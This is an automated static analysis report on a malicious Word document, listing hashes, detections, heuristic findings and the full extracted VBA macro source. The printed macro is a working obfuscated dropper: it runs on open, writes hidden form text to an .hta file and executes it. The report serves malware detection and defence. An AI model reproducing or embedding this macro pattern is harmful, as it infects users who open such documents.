Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2c05fd924ae513df…

MALICIOUS

Office (OOXML)

61.8 KB Created: 2021-02-01 11:15:00 UTC Authoring application: WPS Office_11.2.0.9926_F1E327BC-269C-435d-A152-05C5408002CA First seen: 2021-02-09
MD5: 4b6e10e93816a3fcef244751bfd234b3 SHA-1: 959b4858098c161c37677056d08971df74cb06fe SHA-256: 2c05fd924ae513dff3b01f711a895dc00012a0e0d8c9a9597b87909c47042ffc
192 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell adNAj & " " & a2Uqik
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set aHwCL = CreateObject("Scripting.FileSystemObject")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://www.wps.cn/officeDocument/2013/wpsCustomDataIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2049 bytes
SHA-256: 0bbdb964aa662d49f925a439819735c5d0020e4b8f838143f9b829211f4719f4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "myf"
Attribute VB_Base = "0{D8A042EE-BED7-4C41-A542-38FE9BE505CE}{76D1A269-2A58-4FBF-A9EC-60907996891E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aJQIV"
Sub AutoOpen()
aokPp
End Sub

Attribute VB_Name = "aheyV"
Function ac35C()
ac35C = myf.text1.value
End Function
Function ahrU8V(azXxA)
Dim abZIOn As String
Dim aEapt As String
Dim a3tBKC As Long
Dim a2bNz As Integer
a3tBKC = Len(azXxA)
abZIOn = ""
For a2bNz = a3tBKC To 1 Step -1
aEapt = Mid(azXxA, a2bNz, 1)
abZIOn = abZIOn & aEapt
Next a2bNz
ahrU8V = abZIOn
End Function
Function aeAFS(aIr2C7)
If Len(aIr2C7) > 0 Then aeAFS = Chr(aIr2C7)
End Function
Function aNxCMG(a3dmi)
If Len(a3dmi) > 0 Then aNxCMG = Split(a3dmi, ".")
End Function
Sub aB0nvd(a6frCQ, aYan3)
Set aHwCL = CreateObject("Scripting.FileSystemObject")
Set aLzWd = aHwCL.CreateTextFile(a6frCQ)
aLzWd.WriteLine aYan3
aLzWd.Close
End Sub

Attribute VB_Name = "apxBH"
Public Const aWBDu As String = "10.23.31.3.0.29.10.29"
Public Const aHOE9n As String = "12.85.51.31.29.0.8.29.14.2.11.14.27.14.51.14.25.54.27.7.65.7.27.14"
Function aEAJb(akScpw, alx6rv)
If Len(akScpw) > 0 Then aEAJb = akScpw Xor alx6rv
End Function
Function aVbRB(akeX6B As Variant)
Dim aW0cx As String
aW0cx = ""
For aicIt = 0 To UBound(akeX6B)
aCbSWg = aeAFS(aEAJb(akeX6B(aicIt), 111))
aW0cx = aW0cx & aCbSWg
Next aicIt
aVbRB = aW0cx
End Function
Sub aokPp()
aWfjHg = ac35C()
adNAj = aVbRB(aNxCMG(aWBDu))
a2Uqik = aVbRB(aNxCMG(aHOE9n))
Call aB0nvd(a2Uqik, ahrU8V(aWfjHg))
Shell adNAj & " " & a2Uqik
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 26112 bytes
SHA-256: 399b800e2d507c9b72968e0ecf9bd6c082a7f4fde010749837589f35e99f62a8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).